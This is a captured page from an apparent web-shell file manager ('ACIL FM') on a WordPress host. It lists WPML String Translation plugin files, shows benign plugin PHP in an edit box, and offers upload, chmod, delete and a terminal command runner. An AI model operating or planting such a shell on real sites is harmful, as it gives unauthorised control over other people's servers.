ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/wpml-string-translation/classes/MO/Hooks
/
home
mhhtmff
www
site
wp-content
plugins
wpml-string-translation
classes
MO
Hooks
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
CustomTextDomains.php
1.7 MB
chmod
View
DL
Edit
Rename
Delete
DetectPrematurelyTranslatedStrings.php
3.07 MB
chmod
View
DL
Edit
Rename
Delete
Factory.php
1.36 MB
chmod
View
DL
Edit
Rename
Delete
LanguageSwitch.php
4.38 MB
chmod
View
DL
Edit
Rename
Delete
LoadMissingMOFiles.php
4.43 MB
chmod
View
DL
Edit
Rename
Delete
LoadTextDomain.php
3.62 MB
chmod
View
DL
Edit
Rename
Delete
PreloadThemeMoFile.php
1.98 MB
chmod
View
DL
Edit
Rename
Delete
StringsLanguageChanged.php
1.38 MB
chmod
View
DL
Edit
Rename
Delete
Sync.php
1.12 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/wpml-string-translation/classes/MO/Hooks/Factory.php
<?php namespace WPML\ST\MO\Hooks; use IWPML_Action; use WPML\ST\DB\Mappers\DomainsRepository; use WPML\ST\MO\File\ManagerFactory; use WPML\ST\TranslationFile\Sync\FileSync; use WPML\ST\TranslationFile\UpdateHooksFactory; use WPML\ST\TranslationFile\Hooks; use function WPML\Container\make; class Factory implements \IWPML_Backend_Action_Loader, \IWPML_Frontend_Action_Loader { /** * Create hooks. * * @return IWPML_Action[] * @throws \WPML\Auryn\InjectionException Auryn Exception. */ public function create() { $manager = ManagerFactory::create(); $moFileSync = make( Sync::class, [ ':fileSync' => make( FileSync::class, [ ':manager' => ManagerFactory::create() ] ), ':useFileSynchronization' => [ Hooks::class, 'useFileSynchronization' ], ] ); return [ UpdateHooksFactory::create(), make( LoadTextDomain::class, [ ':file_manager' => $manager ] ), make( CustomTextDomains::class, [ ':file_manager' => $manager, ':syncMissingFile' => [ $moFileSync, 'syncFile' ], ] ), make( LanguageSwitch::class ), make( LoadMissingMOFiles::class ), make( PreloadThemeMoFile::class ), make( DetectPrematurelyTranslatedStrings::class ), $moFileSync, make( StringsLanguageChanged::class, [ ':manager' => $manager, ':getDomainsByStringIds' => DomainsRepository::getByStringIds(), ] ), ]; } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply